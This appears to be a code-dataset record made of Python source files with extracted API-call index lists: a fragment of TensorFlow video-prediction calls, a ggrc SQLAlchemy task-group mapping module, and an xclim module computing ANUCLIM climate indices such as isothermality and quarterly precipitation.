'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[action, current_state]'}), '(axis=1, values=[action, current_state])\n', (7705, 7745), True, 'import tensorflow as tf\n'), ((7760, 7922), 'tensorflow.contrib.slim.layers.conv2d', 'slim.layers.conv2d', (['prev_image', '(32)', '[5, 5]'], {'stride': '(2)', 'scope': '"""scale1_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'layer_norm1'}"}), "(prev_image, 32, [5, 5], stride=2, scope='scale1_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'layer_norm1'})\n", (7778, 7922), True, 'import tensorflow.contrib.slim as slim\n'), ((8092, 8142), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden1'], {'scope': '"""layer_norm2"""'}), "(hidden1, scope='layer_norm2')\n", (8112, 8142), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8261, 8311), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden2'], {'scope': '"""layer_norm3"""'}), "(hidden2, scope='layer_norm3')\n", (8281, 8311), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8537, 8587), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden3'], {'scope': '"""layer_norm4"""'}), "(hidden3, scope='layer_norm4')\n", (8557, 8587), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8706, 8756), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden4'], {'scope': '"""layer_norm5"""'}), "(hidden4, scope='layer_norm5')\n", (8726, 8756), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((9935, 9985), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden5'], {'scope': '"""layer_norm6"""'}), "(hidden5, scope='layer_norm6')\n", (9955, 9985), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10226, 10276), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden6'], {'scope': '"""layer_norm7"""'}), "(hidden6, scope='layer_norm7')\n", (10246, 10276), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10318, 10359), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden6, enc1]'}), '(axis=3, values=[hidden6, enc1])\n', (10327, 10359), True, 'import tensorflow as tf\n'), ((10614, 10664), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden7'], {'scope': '"""layer_norm8"""'}), "(hidden7, scope='layer_norm8')\n", (10634, 10664), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10707, 10748), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden7, enc0]'}), '(axis=3, values=[hidden7, enc0])\n', (10716, 10748), True, 'import tensorflow as tf\n'), ((12360, 12463), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(num_masks + 1)', '(1)'], {'stride': '(1)', 'scope': '"""convt7"""', 'activation_fn': 'None'}), "(enc6, num_masks + 1, 1, stride=1, scope=\n 'convt7', activation_fn=None)\n", (12388, 12463), True, 'import tensorflow.contrib.slim as slim\n'), ((12656, 12719), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(num_masks + 1)', 'value': 'masks'}), '(axis=3, num_or_size_splits=num_masks + 1, value=masks)\n', (12664, 12719), True, 'import tensorflow as tf\n'), ((13990, 14021), 'spatial_transformer.transformer', 'transformer', (['prev_image', 'params'], {}), '(prev_image, params)\n', (14001, 14021), False, 'from spatial_transformer import transformer\n'), ((17047, 17089), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['kernel', '[3]'], {'keep_dims': '(True)'}), '(kernel, [3], keep_dims=True)\n', (17060, 17089), True, 'import tensorflow as tf\n'), ((1452, 1469), 'tensorflow.exp', 'tf.exp', (['log_sigma'], {}), '(log_sigma)\n', (1458, 1469), True, 'import tensorflow as tf\n'), ((9155, 9194), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[enc2, smear]'}), '(axis=3, values=[enc2, smear])\n', (9164, 9194), True, 'import tensorflow as tf\n'), ((11112, 11220), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(DNA_KERN_SIZE ** 2)', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, DNA_KERN_SIZE ** 2, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11140, 11220), True, 'import tensorflow.contrib.slim as slim\n'), ((11325, 11429), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', 'color_channels', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, color_channels, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11353, 11429), True, 'import tensorflow.contrib.slim as slim\n'), ((11728, 11788), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['stp_input0', '(100)'], {'scope': '"""fc_stp"""'}), "(stp_input0, 100, scope='fc_stp')\n", (11755, 11788), True, 'import tensorflow.contrib.slim as slim\n'), ((1436, 1449), 'tensorflow.square', 'tf.square', (['mu'], {}), '(mu)\n', (1445, 1449), True, 'import tensorflow as tf\n'), ((6349, 6372), 'tensorflow.to_float', 'tf.to_float', (['batch_size'], {}), '(batch_size)\n', (6360, 6372), True, 'import tensorflow as tf\n'), ((9611, 9644), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[latent]'], {}), '([latent])\n', (9634, 9644), True, 'import tensorflow as tf\n'), ((9663, 9691), 'tensorflow.concat', 'tf.concat', (['[enc2, latent]', '(3)'], {}), '([enc2, latent], 3)\n', (9672, 9691), True, 'import tensorflow as tf\n'), ((11607, 11626), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['enc7'], {}), '(enc7)\n', (11620, 11626), True, 'import tensorflow as tf\n'), ((12520, 12558), 'tensorflow.reshape', 'tf.reshape', (['masks', '[-1, num_masks + 1]'], {}), '(masks, [-1, num_masks + 1])\n', (12530, 12558), True, 'import tensorflow as tf\n'), ((16758, 16845), 'tensorflow.slice', 'tf.slice', (['prev_image_pad', '[0, xkern, ykern, 0]', '[-1, image_height, image_width, -1]'], {}), '(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height,\n image_width, -1])\n', (16766, 16845), True, 'import tensorflow as tf\n'), ((6385, 6405), 'tensorflow.exp', 'tf.exp', (['(iter_num / k)'], {}), '(iter_num / k)\n', (6391, 6405), True, 'import tensorflow as tf\n'), ((9493, 9512), 'tensorflow.identity', 'tf.identity', (['latent'], {}), '(latent)\n', (9504, 9512), True, 'import tensorflow as tf\n'), ((9563, 9587), 'tensorflow.exp', 'tf.exp', (['(latent_std / 2.0)'], {}), '(latent_std / 2.0)\n', (9569, 9587), True, 'import tensorflow as tf\n')] |
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: <EMAIL>
# Maintained By: <EMAIL>
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
| [
"ggrc.models.reflection.PublishOnly",
"ggrc.db.UniqueConstraint",
"sqlalchemy.orm.subqueryload",
"ggrc.db.Index",
"ggrc.db.ForeignKey",
"ggrc.db.Column"
] | [((621, 658), 'ggrc.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (630, 658), False, 'from ggrc import db\n'), ((675, 711), 'ggrc.db.Column', 'db.Column', (['db.String'], {'nullable': '(False)'}), '(db.String, nullable=False)\n', (684, 711), False, 'from ggrc import db\n'), ((558, 589), 'ggrc.db.ForeignKey', 'db.ForeignKey', (['"""task_groups.id"""'], {}), "('task_groups.id')\n", (571, 589), False, 'from ggrc import db\n'), ((2710, 2736), 'ggrc.models.reflection.PublishOnly', 'PublishOnly', (['"""task_groups"""'], {}), "('task_groups')\n", (2721, 2736), False, 'from ggrc.models.reflection import PublishOnly\n'), ((1188, 1252), 'ggrc.db.UniqueConstraint', 'db.UniqueConstraint', (['"""task_group_id"""', '"""object_id"""', '"""object_type"""'], {}), "('task_group_id', 'object_id', 'object_type')\n", (1207, 1252), False, 'from ggrc import db\n'), ((1262, 1307), 'ggrc.db.Index', 'db.Index', (['"""ix_task_group_id"""', '"""task_group_id"""'], {}), "('ix_task_group_id', 'task_group_id')\n", (1270, 1307), False, 'from ggrc import db\n'), ((1559, 1589), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group"""'], {}), "('task_group')\n", (1575, 1589), False, 'from sqlalchemy import orm\n'), ((3003, 3041), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group_objects"""'], {}), "('task_group_objects')\n", (3019, 3041), False, 'from sqlalchemy import orm\n')] |
# noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quearter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
period is calculated. If the input data frequency is daily ("D") or weekly ("W") quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
f'Unknown operation "{op}" ; not one of "wettest" or "driest"'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
precipitation of this period is calculated. If the input data frequency is daily ("D) or weekly ("W"), quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray : [mm]
Total precipitation values of the {op} quarter of each year
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
f'Unknown operation "{op}" ; op parameter but be one of "wettest" or "driest"'
)
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
| [
"xclim.core.units.units",
"numpy.ceil",
"xclim.core.units.units2pint",
"xclim.core.units.convert_units_to",
"xarray.Dataset",
"xclim.core.units.rate2amount",
"xclim.core.utils.ensure_chunk_size",
"xclim.core.units.declare_units",
"xarray.set_options"
] | [((1421, 1482), 'xclim.core.units.declare_units', 'declare_units', ([], {'tasmin': '"""[temperature]"""', 'tasmax': '"""[temperature]"""'}), "(tasmin='[temperature]', tasmax='[temperature]')\n", (1434, 1482), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((2760, 2794), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (2773, 2794), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4548, 4583), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (4561, 4583), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6563, 6597), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (6576, 6597), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((8529, 8585), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""', 'pr': '"""[precipitation]"""'}), "(tas='[temperature]', pr='[precipitation]')\n", (8542, 8585), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((10436, 10471), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (10449, 10471), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((12570, 12626), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""', 'tas': '"""[temperature]"""'}), "(pr='[precipitation]', tas='[temperature]')\n", (12583, 12626), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((14495, 14530), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (14508, 14530), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15506, 15541), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (15519, 15541), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4379, 4405), 'xclim.core.units.convert_units_to', 'convert_units_to', (['tas', '"""K"""'], {}), "(tas, 'K')\n", (4395, 4405), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15378, 15393), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (15389, 15393), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((16719, 16734), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (16730, 16734), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((17961, 18027), 'xarray.Dataset', 'xarray.Dataset', ([], {'data_vars': "{'criteria': criteria, 'output': output}"}), "(data_vars={'criteria': criteria, 